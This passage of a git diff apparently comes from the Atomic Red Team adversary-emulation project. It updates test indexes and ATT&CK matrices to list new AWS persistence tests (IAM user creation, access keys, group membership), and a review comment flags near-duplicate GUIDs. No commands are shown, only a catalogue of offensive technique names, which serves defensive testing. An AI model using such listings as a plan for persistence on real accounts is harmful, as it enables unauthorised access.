github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.
006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 333ded94..8f50e385 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -492,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
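Review bot: The two GUIDs added in this hunk, `8822c3b0-d9f9-4daf-a043-49f110a31122` for T1098 test 3 and `8822c3b0-d9f9-4daf-a043-491160a31122` for T1098.001 test 1, differ only in the last group and look hand-derived from one another rather than independently generated. The atomic GUID is the identifier tooling uses to select and report a test, so near-duplicates invite a collision the moment either value is "corrected" to match the other; each test should carry a fresh value from `uuidgen` or `[guid]::NewGuid()`. If these index rows are regenerated from the test YAML, the fix belongs in the `auto_generated_guid` of those two tests, with the indexes regenerated afterwards.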
@@ -510,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
 persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 0e0f2184..31e71a51 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -151,10 +151,13 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 19dec5dc..1fa4db89 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -847,10 +847,12 @@
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -882,7 +884,8 @@
   - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 957af315..64db3fe8 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -406,10 +406,12 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 
 # persistence
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
   - Atomic Test #1: At - Schedule a job [linux]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -419,7 +421,8 @@
   - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index e55aedd3..453f1a9f 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -1,16 +1,16 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | 
Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index d6aa3ef7..06b1e02f 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -6,7 +6,7 @@ | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials 
